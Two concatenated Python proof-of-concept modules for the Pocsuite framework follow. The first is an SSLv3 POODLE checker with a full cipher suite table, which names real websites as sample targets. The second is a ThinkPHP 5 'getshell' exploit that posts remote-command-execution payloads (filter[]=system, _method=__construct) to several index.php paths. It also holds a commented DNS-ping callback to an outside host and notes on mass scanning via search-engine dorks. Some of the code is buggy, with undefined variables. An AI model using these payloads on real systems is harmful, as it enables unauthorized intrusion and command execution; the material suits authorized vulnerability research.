ssl3_cipher['\x00\x81'] = "TLS_GOSTR341001_WITH_28147_CNT_IMIT"
ssl3_cipher['\x00\x82'] = "TLS_GOSTR341094_WITH_NULL_GOSTR3411"
ssl3_cipher['\x00\x83'] = "TLS_GOSTR341001_WITH_NULL_GOSTR3411"
ssl3_cipher['\x00\x84'] = "TLS_RSA_WITH_CAMELLIA_256_CBC_SHA"
ssl3_cipher['\x00\x85'] = "TLS_DH_DSS_WITH_CAMELLIA_256_CBC_SHA"
ssl3_cipher['\x00\x86'] = "TLS_DH_RSA_WITH_CAMELLIA_256_CBC_SHA"
ssl3_cipher['\x00\x87'] = "TLS_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA"
ssl3_cipher['\x00\x88'] = "TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA"
ssl3_cipher['\x00\x89'] = "TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA"
ssl3_cipher['\x00\x8A'] = "TLS_PSK_WITH_RC4_128_SHA"
ssl3_cipher['\x00\x8B'] = "TLS_PSK_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\x00\x8C'] = "TLS_PSK_WITH_AES_128_CBC_SHA"
ssl3_cipher['\x00\x8D'] = "TLS_PSK_WITH_AES_256_CBC_SHA"
ssl3_cipher['\x00\x8E'] = "TLS_DHE_PSK_WITH_RC4_128_SHA"
ssl3_cipher['\x00\x8F'] = "TLS_DHE_PSK_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\x00\x90'] = "TLS_DHE_PSK_WITH_AES_128_CBC_SHA"
ssl3_cipher['\x00\x91'] = "TLS_DHE_PSK_WITH_AES_256_CBC_SHA"
ssl3_cipher['\x00\x92'] = "TLS_RSA_PSK_WITH_RC4_128_SHA"
ssl3_cipher['\x00\x93'] = "TLS_RSA_PSK_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\x00\x94'] = "TLS_RSA_PSK_WITH_AES_128_CBC_SHA"
ssl3_cipher['\x00\x95'] = "TLS_RSA_PSK_WITH_AES_256_CBC_SHA"
ssl3_cipher['\x00\x96'] = "TLS_RSA_WITH_SEED_CBC_SHA"
ssl3_cipher['\x00\x97'] = "TLS_DH_DSS_WITH_SEED_CBC_SHA"
ssl3_cipher['\x00\x98'] = "TLS_DH_RSA_WITH_SEED_CBC_SHA"
ssl3_cipher['\x00\x99'] = "TLS_DHE_DSS_WITH_SEED_CBC_SHA"
ssl3_cipher['\x00\x9A'] = "TLS_DHE_RSA_WITH_SEED_CBC_SHA"
ssl3_cipher['\x00\x9B'] = "TLS_DH_anon_WITH_SEED_CBC_SHA"
ssl3_cipher['\x00\x9C'] = "TLS_RSA_WITH_AES_128_GCM_SHA256"
ssl3_cipher['\x00\x9D'] = "TLS_RSA_WITH_AES_256_GCM_SHA384"
ssl3_cipher['\x00\x9E'] = "TLS_DHE_RSA_WITH_AES_128_GCM_SHA256"
ssl3_cipher['\x00\x9F'] = "TLS_DHE_RSA_WITH_AES_256_GCM_SHA384"
ssl3_cipher['\x00\xA0'] = "TLS_DH_RSA_WITH_AES_128_GCM_SHA256"
ssl3_cipher['\x00\xA1'] = "TLS_DH_RSA_WITH_AES_256_GCM_SHA384"
ssl3_cipher['\x00\xA2'] = "TLS_DHE_DSS_WITH_AES_128_GCM_SHA256"
ssl3_cipher['\x00\xA3'] = "TLS_DHE_DSS_WITH_AES_256_GCM_SHA384"
ssl3_cipher['\x00\xA4'] = "TLS_DH_DSS_WITH_AES_128_GCM_SHA256"
ssl3_cipher['\x00\xA5'] = "TLS_DH_DSS_WITH_AES_256_GCM_SHA384"
ssl3_cipher['\x00\xA6'] = "TLS_DH_anon_WITH_AES_128_GCM_SHA256"
ssl3_cipher['\x00\xA7'] = "TLS_DH_anon_WITH_AES_256_GCM_SHA384"
ssl3_cipher['\x00\xA8'] = "TLS_PSK_WITH_AES_128_GCM_SHA256"
ssl3_cipher['\x00\xA9'] = "TLS_PSK_WITH_AES_256_GCM_SHA384"
ssl3_cipher['\x00\xAA'] = "TLS_DHE_PSK_WITH_AES_128_GCM_SHA256"
ssl3_cipher['\x00\xAB'] = "TLS_DHE_PSK_WITH_AES_256_GCM_SHA384"
ssl3_cipher['\x00\xAC'] = "TLS_RSA_PSK_WITH_AES_128_GCM_SHA256"
ssl3_cipher['\x00\xAD'] = "TLS_RSA_PSK_WITH_AES_256_GCM_SHA384"
ssl3_cipher['\x00\xAE'] = "TLS_PSK_WITH_AES_128_CBC_SHA256"
ssl3_cipher['\x00\xAF'] = "TLS_PSK_WITH_AES_256_CBC_SHA384"
ssl3_cipher['\x00\xB0'] = "TLS_PSK_WITH_NULL_SHA256"
ssl3_cipher['\x00\xB1'] = "TLS_PSK_WITH_NULL_SHA384"
ssl3_cipher['\x00\xB2'] = "TLS_DHE_PSK_WITH_AES_128_CBC_SHA256"
ssl3_cipher['\x00\xB3'] = "TLS_DHE_PSK_WITH_AES_256_CBC_SHA384"
ssl3_cipher['\x00\xB4'] = "TLS_DHE_PSK_WITH_NULL_SHA256"
ssl3_cipher['\x00\xB5'] = "TLS_DHE_PSK_WITH_NULL_SHA384"
ssl3_cipher['\x00\xB6'] = "TLS_RSA_PSK_WITH_AES_128_CBC_SHA256"
ssl3_cipher['\x00\xB7'] = "TLS_RSA_PSK_WITH_AES_256_CBC_SHA384"
ssl3_cipher['\x00\xB8'] = "TLS_RSA_PSK_WITH_NULL_SHA256"
ssl3_cipher['\x00\xB9'] = "TLS_RSA_PSK_WITH_NULL_SHA384"
ssl3_cipher['\x00\xBA'] = "TLS_RSA_WITH_CAMELLIA_128_CBC_SHA256"
ssl3_cipher['\x00\xBB'] = "TLS_DH_DSS_WITH_CAMELLIA_128_CBC_SHA256"
ssl3_cipher['\x00\xBC'] = "TLS_DH_RSA_WITH_CAMELLIA_128_CBC_SHA256"
ssl3_cipher['\x00\xBD'] = "TLS_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA256"
ssl3_cipher['\x00\xBE'] = "TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA256"
ssl3_cipher['\x00\xBF'] = "TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA256"
ssl3_cipher['\x00\xC0'] = "TLS_RSA_WITH_CAMELLIA_256_CBC_SHA256"
ssl3_cipher['\x00\xC1'] = "TLS_DH_DSS_WITH_CAMELLIA_256_CBC_SHA256"
ssl3_cipher['\x00\xC2'] = "TLS_DH_RSA_WITH_CAMELLIA_256_CBC_SHA256"
ssl3_cipher['\x00\xC3'] = "TLS_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA256"
ssl3_cipher['\x00\xC4'] = "TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA256"
ssl3_cipher['\x00\xC5'] = "TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA256"
ssl3_cipher['\x00\x00'] = "TLS_EMPTY_RENEGOTIATION_INFO_SCSV"
ssl3_cipher['\xc0\x01'] = "TLS_ECDH_ECDSA_WITH_NULL_SHA"
ssl3_cipher['\xc0\x02'] = "TLS_ECDH_ECDSA_WITH_RC4_128_SHA"
ssl3_cipher['\xc0\x03'] = "TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\xc0\x04'] = "TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA"
ssl3_cipher['\xc0\x05'] = "TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA"
ssl3_cipher['\xc0\x06'] = "TLS_ECDHE_ECDSA_WITH_NULL_SHA"
ssl3_cipher['\xc0\x07'] = "TLS_ECDHE_ECDSA_WITH_RC4_128_SHA"
ssl3_cipher['\xc0\x08'] = "TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\xc0\x09'] = "TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA"
ssl3_cipher['\xc0\x0a'] = "TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA"
ssl3_cipher['\xc0\x0b'] = "TLS_ECDH_RSA_WITH_NULL_SHA"
ssl3_cipher['\xc0\x0c'] = "TLS_ECDH_RSA_WITH_RC4_128_SHA"
ssl3_cipher['\xc0\x0d'] = "TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\xc0\x0e'] = "TLS_ECDH_RSA_WITH_AES_128_CBC_SHA"
ssl3_cipher['\xc0\x0f'] = "TLS_ECDH_RSA_WITH_AES_256_CBC_SHA"
ssl3_cipher['\xc0\x10'] = "TLS_ECDHE_RSA_WITH_NULL_SHA"
ssl3_cipher['\xc0\x11'] = "TLS_ECDHE_RSA_WITH_RC4_128_SHA"
ssl3_cipher['\xc0\x12'] = "TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\xc0\x13'] = "TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"
ssl3_cipher['\xc0\x14'] = "TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA"
ssl3_cipher['\xc0\x15'] = "TLS_ECDH_anon_WITH_NULL_SHA"
ssl3_cipher['\xc0\x16'] = "TLS_ECDH_anon_WITH_RC4_128_SHA"
ssl3_cipher['\xc0\x17'] = "TLS_ECDH_anon_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\xc0\x18'] = "TLS_ECDH_anon_WITH_AES_128_CBC_SHA"
ssl3_cipher['\xc0\x19'] = "TLS_ECDH_anon_WITH_AES_256_CBC_SHA"
ssl3_cipher['\xC0\x1A'] = "TLS_SRP_SHA_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\xC0\x1B'] = "TLS_SRP_SHA_RSA_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\xC0\x1C'] = "TLS_SRP_SHA_DSS_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\xC0\x1D'] = "TLS_SRP_SHA_WITH_AES_128_CBC_SHA"
ssl3_cipher['\xC0\x1E'] = "TLS_SRP_SHA_RSA_WITH_AES_128_CBC_SHA"
ssl3_cipher['\xC0\x1F'] = "TLS_SRP_SHA_DSS_WITH_AES_128_CBC_SHA"
ssl3_cipher['\xC0\x20'] = "TLS_SRP_SHA_WITH_AES_256_CBC_SHA"
ssl3_cipher['\xC0\x21'] = "TLS_SRP_SHA_RSA_WITH_AES_256_CBC_SHA"
ssl3_cipher['\xC0\x22'] = "TLS_SRP_SHA_DSS_WITH_AES_256_CBC_SHA"
ssl3_cipher['\xC0\x23'] = "TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256"
ssl3_cipher['\xC0\x24'] = "TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384"
ssl3_cipher['\xC0\x25'] = "TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA256"
ssl3_cipher['\xC0\x26'] = "TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA384"
ssl3_cipher['\xC0\x27'] = "TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256"
ssl3_cipher['\xC0\x28'] = "TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384"
ssl3_cipher['\xC0\x29'] = "TLS_ECDH_RSA_WITH_AES_128_CBC_SHA256"
ssl3_cipher['\xC0\x2A'] = "TLS_ECDH_RSA_WITH_AES_256_CBC_SHA384"
ssl3_cipher['\xC0\x2B'] = "TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256"
ssl3_cipher['\xC0\x2C'] = "TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384"
ssl3_cipher['\xC0\x2D'] = "TLS_ECDH_ECDSA_WITH_AES_128_GCM_SHA256"
ssl3_cipher['\xC0\x2E'] = "TLS_ECDH_ECDSA_WITH_AES_256_GCM_SHA384"
ssl3_cipher['\xC0\x2F'] = "TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"
ssl3_cipher['\xC0\x30'] = "TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"
ssl3_cipher['\xC0\x31'] = "TLS_ECDH_RSA_WITH_AES_128_GCM_SHA256"
ssl3_cipher['\xC0\x32'] = "TLS_ECDH_RSA_WITH_AES_256_GCM_SHA384"
ssl3_cipher['\xC0\x33'] = "TLS_ECDHE_PSK_WITH_RC4_128_SHA"
ssl3_cipher['\xC0\x34'] = "TLS_ECDHE_PSK_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\xC0\x35'] = "TLS_ECDHE_PSK_WITH_AES_128_CBC_SHA"
ssl3_cipher['\xC0\x36'] = "TLS_ECDHE_PSK_WITH_AES_256_CBC_SHA"
ssl3_cipher['\xC0\x37'] = "TLS_ECDHE_PSK_WITH_AES_128_CBC_SHA256"
ssl3_cipher['\xC0\x38'] = "TLS_ECDHE_PSK_WITH_AES_256_CBC_SHA384"
ssl3_cipher['\xC0\x39'] = "TLS_ECDHE_PSK_WITH_NULL_SHA"
ssl3_cipher['\xC0\x3A'] = "TLS_ECDHE_PSK_WITH_NULL_SHA256"
ssl3_cipher['\xC0\x3B'] = "TLS_ECDHE_PSK_WITH_NULL_SHA384"
ssl3_cipher['\xfe\xfe'] = "SSL_RSA_FIPS_WITH_DES_CBC_SHA"
ssl3_cipher['\xfe\xff'] = "SSL_RSA_FIPS_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\xff\xe0'] = "SSL_RSA_FIPS_WITH_3DES_EDE_CBC_SHA"
ssl3_cipher['\xff\xe1'] = "SSL_RSA_FIPS_WITH_DES_CBC_SHA"


def get_ssl_records(buffer):
    """
    params:
        buffer[str]:
    """
    lst_records = []
    if len(buffer)>=9:
        ssl_status = struct.unpack('>BHHI', buffer[0:9])
        i_type = (ssl_status[3] & (0xFF000000)) >> 24
        record_len  = ssl_status[3] & (0x00FFFFFF)
        i_shake_protocol = ssl_status[0]
        ssl_len = ssl_status[2]

        # Multiple Handshakes
        if (record_len + 5 < ssl_len):
            lst_records.append((i_shake_protocol, i_type))
            i_loop_stopper = 0
            i_next_offset = record_len + 9
            while i_next_offset < len(buffer):
                i_loop_stopper += 1
                count = 0
                # Need more data to fill buffer
                while ((i_next_offset+4) > len(buffer) and count < 5):
                    count += 1

                    """
                    # [BUG] [TO FIX]
                    # rule变量未定义, 代码出自 https://github.com/hahwul/a2sv/blob/master/module/M_poodle.py
                    rule.waitForData()
                    if len(rule.buffer) > 0:
                        buffer += rule.buffer
                    """

                # End of message
                if ((i_next_offset+4) > len(buffer)):
                    break

                i_typeAndata_len = struct.unpack(">I", buffer[i_next_offset:i_next_offset+4])[0]
                record_len = i_typeAndata_len & (0x00FFFFFF)
                i_type = (i_typeAndata_len & (0xFF000000))>>24
                lst_records.append((i_shake_protocol, i_type))
                i_next_offset += (record_len + 4)
                if i_loop_stopper > 8:
                    break

            return lst_records
        # Multiple Records
        elif (record_len + 9 < len(buffer)):
            lst_records.append((i_shake_protocol,i_type))
            i_next_offset = record_len + 9
            i_loop_stopper = 0
            while i_next_offset+6 < len(buffer):
                i_loop_stopper += 1
                i_shake_protocol = struct.unpack(">B", buffer[i_next_offset])[0]
                record_len = struct.unpack(">H", buffer[i_next_offset+3:i_next_offset+5])[0]
                i_type = struct.unpack(">B", buffer[i_next_offset+5])[0]
                lst_records.append((i_shake_protocol, i_type))
                i_next_offset += record_len + 5
                if i_loop_stopper > 8:
                    break
            return lst_records
        # Single record
        elif (record_len + 9 == len(buffer)):
            ssl_status = check_ssl_header(buffer)
            lst_records.append((ssl_status[0], ssl_status[2]))
            return lst_records
    return None


def check_ssl_header(buffer):
    if len(buffer)>=6:
        ssl_status = struct.unpack('>BHHI', buffer[0:9])
        i_type = (ssl_status[3] & (0xFF000000))>>24
        record_len  = ssl_status[3] & (0x00FFFFFF)
        i_shake_protocol = ssl_status[0]
        ssl_len = ssl_status[2]
        return (i_shake_protocol, ssl_len, i_type, record_len)
    return None


def make_hello(ssl_ver):
    """
    params:
        ssl_ver[str]: ['SSLv3', 'TLSv1', 'TLSv1.1', 'TLSv1.2']
    """
    r = "\x16"                  # Message Type 22
    r += SSL_VERS[ssl_ver]
    ciphers = ""
    for c in ssl3_cipher.keys():
        ciphers += c
    data_len = 43 + len(ciphers)
    r += struct.pack("!H", data_len)

    h = "\x01"
    p_len = struct.pack("!L", data_len-4)
    h += p_len[1:]
    h += SSL_VERS[ssl_ver]
    rand = struct.pack("!L", int(time.time()))
    rand += "\x36\x24\x34\x16\x27\x09\x22\x07\xd7\xbe\xef\x69\xa1\xb2"
    rand += "\x37\x23\x14\x96\x27\xa9\x12\x04\xe7\xce\xff\xd9\xae\xbb"
    h += rand
    h += "\x00"                 # No Session ID
    h += struct.pack("!H", len(ciphers))
    h += ciphers
    h += "\x01\x00"
    return r+h


def check_poodle(host, port):
    """
    params:
        host[str]: target host ip
        port[int]: target host port
    """
    vuln_count = 0
    for ssl_ver in ["SSLv3"]:
        hello_msg = make_hello(ssl_ver)

        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(5)
        s.connect((host, port))

        s.send(hello_msg)

        count = 0
        f_server_hello = False
        f_cert = False
        f_kex = False
        f_hello_done = False
        while count < 5:
            count += 1
            try:
                recv = s.recv(2048)
            except:
                continue

            lst_records = get_ssl_records(recv)

            if lst_records != None and len(lst_records) > 0:
                for (i_shake_protocol, i_type) in lst_records:
                    if i_shake_protocol == 22:
                        if i_type == 2:
                            f_server_hello = True
                        elif i_type == 11:
                            f_cert = True
                        elif i_type == 12:
                            f_kex = True
                        elif i_type == 14:
                            f_hello_done = True
                if (f_server_hello and f_cert):
                    break
            else:
                continue

        if not (f_server_hello and f_cert):
            #print(" [-] Invalid SSLv3 handshake.")
            pass
        elif len(recv) > 0 and ord(recv[0]) == 22:
            vuln_count += 1
        else:
            #print(" [-] %s No response from %s:%d" % (ssl_ver, host, port))
            pass

        try:
            s.close()
        except:
            pass

    if vuln_count > 0:
        #print(" [+] Allow SSLv3 Protocol")
        return True
    else:
        return False


class SSLv3_POODLE(POCBase):
    vulID = '0'                 # vul ID
    version = '1'
    author = 'janes'
    vulDate = '2014-05-14'
    createDate = '2017-02-15'
    updateDate = '2017-02-15'
    references = ['https://www.openssl.org/~bodo/ssl-poodle.pdf']
    name = 'SSL 3.0 POODLE攻击信息泄露漏洞 POC'
    appPowerLink = 'https://tools.ietf.org/html/rfc6101'
    appName = 'SSL'
    appVersion = '3.0'
    vulType = 'Information Disclosure'
    desc = '''
        SSL 3.0使用的CBC块加密的实现存在漏洞，攻击者可以成功破解SSL连接的加密信息，比如获取用户cookie数据
    '''
    samples = ['www.baidu.com', 'taobao.com']


    def _verify(self):
        result = {}
        output = Output(self)

        target_ip = url2ip(self.url)
        url = urlparse.urlparse(self.url)
        port = url.port or 443

        if check_poodle(target_ip, port):
            output.success(result)
        else:
            output.fail('Not support SSLv3 connection. Not Vulnerable')
        return output

    def _attack(self):
        return self._verify()


register(SSLv3_POODLE)



#!/usr/bin/env python
# -*- coding: utf-8 -*-

"""
Copyright (c) 2014-2015 pocsuite developers (http://seebug.org)
See the file 'docs/COPYING' for copying permission
"""

# requests
from pocsuite.api.request import req
import urllib
# register
from pocsuite.api.poc import register
# report
from pocsuite.api.poc import Output, POCBase
# url转换host
from pocsuite.lib.utils.funs import url2ip
import re
import requests
 
 

# 基础基类
class webLogicPOC(POCBase):
    vulID = '56'  # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0
    version = '1'  # 默认为1
    vulDate = '2019-1-15'  # 漏洞公开的时间,不知道就写今天
    author = 'xiaohuihui1'  # PoC作者的大名
    createDate = '2019-1-15'  # 编写 PoC 的日期
    updateDate = '2019-1-15'  # PoC 更新的时间,默认和编写时间一样
    references = ['https://xz.aliyun.com/t/3845','https://xz.aliyun.com/t/3868']  # 漏洞地址来源,0day不用写
    name = 'thinkphp getshell'  # PoC 名称
    appPowerLink = ['']  # 漏洞厂商主页地址
    appName = 'thinkphp getshell'  # 漏洞应用名称
    appVersion = '5.0全版本'  # 漏洞影响版本
    vulType = 'thinkphp getshell'  # 漏洞类型,类型参考见 漏洞类型规范表
    desc = '''
        thinkphp getshell
    '''  # 漏洞简要描述
    samples = []  # 测试样列,就是用 PoC 测试成功的网站
    install_requires = []  # PoC 第三方模块依赖，请尽量不要使用第三方模块，必要时请参考《PoC第三方模块依赖说明》填写
    cvss = u"严重"  # 严重,高危,中危,低危


    # 指纹方法
    def _fingerprint(self):
        pass

    # 验证模块 pocsuite -r 1-redis.py -u 10.1.5.26 --verify
    def _verify(self):
        # 调用指纹方法
        result={}

        #如果设置端口则取端口,没有设置则为默认端口
        import re
        import socket
        import time
        vul_url = "%s"%self.url
        # from pocsuite.lib.utils.funs import url2ip
        _port = re.findall(':(\d+)\s*', vul_url)
        if len(_port) != 0:
            _host = url2ip(vul_url)[0]
            _port = int(url2ip(vul_url)[1])
        else :
            _host = url2ip(vul_url)
            _port = 80
        
	
        #判断端口是否开放.   
        import socket
        sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sk.settimeout(1)
        try:
            sk.connect((_host,_port))
            #print 'Server port is OK!'
        except Exception:
           return self.save_output(result)
        sk.close()
        
        vul_ip = "http://%s:%s" % (_host, _port)
        #url=vul_ip+"/public/index.php?s=captcha"
        #data={"_method":"__construct","filter[]":"system","method":"get","server[REQUEST_METHOD]":"ping%20t00ls.7272e87394b4f7c0088c966cba58c1dd.tu4.org"}
        
        head={"Content-Type":"application/x-www-form-urlencoded"}

        url1 = vul_ip+"/public/index.php"
        #url1= "http://127.0.0.1/thinkphp/thinkphp_5.0.10_full/public/index.php"
        #data1 = {"c":"printf","f":"1234567890","_method":"filter"}
        data1 = {"c":"printf","f":"1234567890","_method":"filter"}
        try:
            text = requests.post(url=url1,data=data1,timeout=4).text
            if ("printf1234567890filter" in text  or "printffilter1234567890" in text or "1234567890filterprintf" in text or "1234567890printffilter" in text or "filterprintf1234567890" in text or "filter1234567890printf" in text) :
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url1
                result['VerifyInfo']['Payload'] = data1
                return self.save_output(result)
        except Exception as e:
            pass
        

        url2 = vul_ip+"/index.php"
        data2 = {"c":"printf","f":"1234567890","method":"filter"}
        try:
            text = req.post(url2,data=data2,timeout=4).text
            if ("printf1234567890filter" in text  or "printffilter1234567890" in text or "1234567890filterprintf" in text or "1234567890printffilter" in text or "filterprintf1234567890" in text or "filter1234567890printf" in text):
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = vul_ip
                result['VerifyInfo']['Payload'] = p
                return self.save_output(result)
        except Exception as e:
            pass

        url3 = vul_ip+"/public/index.php?s=captcha"
        data3 = {"_method":"__construct","filter[]":"system","method":"get","get[]":"more index.php"}
        try:
            text = req.post(url3,data=data3,timeout=4).text
            if ("thinkphp/start.php" in text):
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = vul_ip
                result['VerifyInfo']['Payload'] = p
                return self.save_output(result)
        except Exception as e:
            pass

        url4 = vul_ip+"/index.php?s=captcha"
        data4 = {"_method":"__construct","filter[]":"system","method":"get","get[]":"more index.php"}
        try:
            text = req.post(url4,data=data4,timeout=4).text
            if ("thinkphp/start.php" in text):
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = vul_ip
                result['VerifyInfo']['Payload'] = p
                return self.save_output(result)
        except Exception as e:
            pass
        
        url5 = vul_ip+"/public/index.php"
        data5 = {"_method":"__construct","filter[]":"system","server[REQUEST_METHOD]":"more index.php"}
        try:
            text = req.post(url5,data=data5,timeout=4).text
            if ("thinkphp/start.php" in text):
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = vul_ip
                result['VerifyInfo']['Payload'] = p
                return self.save_output(result)
        except Exception as e:
            pass

        url6 = vul_ip+"/index.php"
        data6 = {"_method":"__construct","filter[]":"system","server[REQUEST_METHOD]":"more index.php"}
        try:
            text = req.post(url6,data=data6,timeout=4).text
            if ("thinkphp/start.php" in text):
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = vul_ip
                result['VerifyInfo']['Payload'] = p
                return self.save_output(result)
        except Exception as e:
            pass

        return self.save_output(result)
            

    # 攻击模块
    def _attack(self):
        return self._verify()
        #pass

    # 输出报告
    def save_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail()
        return output

# 注册类
register(webLogicPOC)

"""
PoC 编写规范及要求说明 https://github.com/knownsec/Pocsuite/blob/master/docs/CODING.md

使用方法 https://github.com/knownsec/Pocsuite/blob/master/docs/translations/USAGE-zh.md

集成 Pocsuite https://github.com/knownsec/Pocsuite/blob/master/docs/INTEGRATE.md

钟馗之眼 批量验证
pocsuite -r 1-redis-getshell.py --verify --dork "redis"  --max-page 50 --search-type host --report report.html
pocsuite -r 1-redis-getshell.py --verify -f results.txt --threads 10 --report report.html
"""


